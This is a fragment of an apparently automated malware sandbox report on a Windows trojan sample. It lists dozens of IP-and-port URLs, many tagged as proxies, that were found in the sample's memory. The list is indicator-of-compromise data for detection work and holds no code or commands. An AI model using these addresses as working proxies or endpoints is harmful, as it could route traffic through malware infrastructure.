                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.236:2093://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9444000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C930F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.15.160:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C936B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.15.160:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.172.128.24:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.172.128.24:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.183.144.117:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.183.144.117:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.136.254:1970
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.136.254:1970://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ECF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.88.242:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C840A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.88.242:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4CF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.255.72.68:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.255.72.68:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C790E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.60:11201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.60:11201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.62:11201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.62:11201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.6:11201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.6:11201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.27.150:11201
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.27.150:11201://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.53.144:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.53.144:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.53.149:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.53.149:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.43.150.166:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.43.150.166:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.46.222.60:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.46.222.60:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.49.138.138:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.49.138.138:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.165.54:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.165.54:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.243.145:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.243.145:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF23000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.60.133:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.60.133:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.75:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.75:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.69.152.180:33333
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.69.152.180:33333://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.1.233:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.1.233:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7636000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.18.147:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.18.147:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.91.106.252:11420
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.91.106.252:11420://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.91.107.220:48351
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.91.107.220:48351://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.27.30:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.27.30:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.107.33.254:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.107.33.254:8090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.109.113.97:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.109.113.97:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.137:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.137:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.99.144.43
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.99.144.43://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.99.144.43x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.136.15
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.136.15://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.136.15:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.188.236.47
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.188.236.47://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.188.236.47:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C676C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.246.129.129:2052
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.246.129.129:2052://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.134.10.174:18351
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.134.10.174:18351://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.134.10.174:18351x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.187.214
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.187.214://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.187.214:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.243.18
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.243.18://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.243.18:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.148.78:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.148.78:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.89.86:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.89.86:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.89.86:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.89.86:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.147.86:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.147.86:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.163:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.163:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.163:8080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.159.154.43:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.159.154.43:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.160.238.106:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.160.238.106:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC28000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.174.152.226:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.174.152.226:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.174.96.38:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.174.96.38:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.184.212.3:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.184.212.3:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.190.233.61:36926
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.190.233.61:36926://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.203.83.66:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.203.83.66:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.207.187.178
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.207.187.178://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.207.187.178:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.69:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.69:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8483000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.223.145:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.223.145:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.234.116:37259
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.234.116:37259://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.225.229.55:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.225.229.55:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.230.216.70
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.230.216.70://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.230.216.70:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.231.37.76:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.231.37.76:3128://proxy
